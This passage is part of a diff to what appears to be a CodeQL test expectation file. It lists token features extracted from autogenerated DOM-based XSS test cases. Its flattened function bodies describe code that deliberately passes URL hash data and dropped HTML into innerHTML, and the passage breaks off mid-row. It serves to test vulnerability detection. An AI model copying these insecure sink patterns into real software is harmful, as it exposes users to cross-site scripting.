MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:66 | dayjs.date | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:66 | dayjs.date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | dayjs.date() | CalleeFlexibleAccessPath | dayjs.setHours | | autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | dayjs.date() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | dayjs.date() | calleeImports | @date-io/dayjs | @@ -13344,6 +99169,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | dayjs.date() | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | dayjs.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | dayjs.date() | receiverName | dayjs | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | exceptional return of dayjs.date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | exceptional return of dayjs.date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | exceptional return of dayjs.date() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | exceptional return of dayjs.date() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:68 | exceptional return of dayjs.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:63:61:66 | date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:63:61:66 | date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:63:61:66 | date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:63:61:66 | date | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:63:61:66 | date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:61:71:61:71 | 4 | CalleeFlexibleAccessPath | dayjs.setHours | | autogenerated/Xss/DomBasedXss/dates.js:61:71:61:71 | 4 | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dates.js:61:71:61:71 | 4 | calleeImports | @date-io/dayjs | @@ -13353,6 +99188,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:61:71:61:71 | 4 | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:61:71:61:71 | 4 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:61:71:61:71 | 4 | receiverName | dayjs | +| autogenerated/Xss/DomBasedXss/dates.js:61:74:61:79 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:74:61:79 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:74:61:79 | format | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:74:61:79 | format | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:74:61:79 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:61:81:61:85 | taint | CalleeFlexibleAccessPath | dayjs.setHours().format | | autogenerated/Xss/DomBasedXss/dates.js:61:81:61:85 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:61:81:61:85 | taint | calleeImports | @date-io/dayjs | @@ -13361,11 +99201,35 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:61:81:61:85 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:61:81:61:85 | taint | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:61:81:61:85 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:0 | this | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:1 | $ | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:1 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:9 | $("#foo") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:9 | $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:9 | $("#foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:9 | exceptional return of $("#foo") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:9 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:9 | exceptional return of $("#foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:12 | $("#foo").on | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:12 | $("#foo").on | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:12 | $("#foo").on | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:26 | $("#foo ... , drop) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:26 | $("#foo ... , drop) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:26 | $("#foo ... , drop) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:26 | exceptional return of $("#foo ... , drop) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:26 | exceptional return of $("#foo ... , drop) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:1:1:26 | exceptional return of $("#foo ... , drop) | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:3:1:8 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:3:1:8 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:3:1:8 | "#foo" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:3:1:8 | "#foo" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:3:1:8 | "#foo" | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:11:1:12 | on | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:11:1:12 | on | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:11:1:12 | on | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:14:1:19 | "drop" | CalleeFlexibleAccessPath | $().on | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:14:1:19 | "drop" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:14:1:19 | "drop" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13376,6 +99240,150 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:22:1:25 | drop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:22:1:25 | drop | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:1:22:1:25 | drop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:3:0 | this | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:3:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:3:0 | this | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:3:0 | this | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:3:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | 'arguments' object of function drop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | 'arguments' object of function drop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | 'arguments' object of function drop | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | 'arguments' object of function drop | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | 'arguments' object of function drop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | exceptional return of function drop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | exceptional return of function drop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | exceptional return of function drop | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | exceptional return of function drop | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | exceptional return of function drop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | functio ... div);\\n} | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | functio ... div);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | functio ... div);\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | return of function drop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | return of function drop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | return of function drop | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | return of function drop | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:1:20:1 | return of function drop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:10:3:13 | drop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:10:3:13 | drop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:10:3:13 | drop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:10:3:13 | drop | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:10:3:13 | drop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:10:3:13 | drop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:3:15:3:15 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:26 | { dataTransfer } | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:26 | { dataTransfer } | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:26 | { dataTransfer } | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:26 | { dataTransfer } | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:26 | { dataTransfer } | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | { dataT ... alEvent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | { dataT ... alEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | { dataT ... alEvent | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | { dataT ... alEvent | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:11:4:44 | { dataT ... alEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:13:4:24 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:30 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:30 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:30 | e | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:30 | e | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:30 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:44 | e.originalEvent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:44 | e.originalEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:44 | e.originalEvent | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:44 | e.originalEvent | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:30:4:44 | e.originalEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:32:4:44 | originalEvent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:32:4:44 | originalEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:32:4:44 | originalEvent | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:32:4:44 | originalEvent | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:4:32:4:44 | originalEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:9:5:21 | !dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:9:5:21 | !dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:9:5:21 | !dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:9:5:21 | !dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:9:5:21 | !dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:5:10:5:21 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:14 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:14 | text | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:14 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:14 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:14 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text = ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text = ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text = ... plain') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text = ... plain') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:11:7:51 | text = ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:29 | dataTransfer | contextFunctionInterfaces | 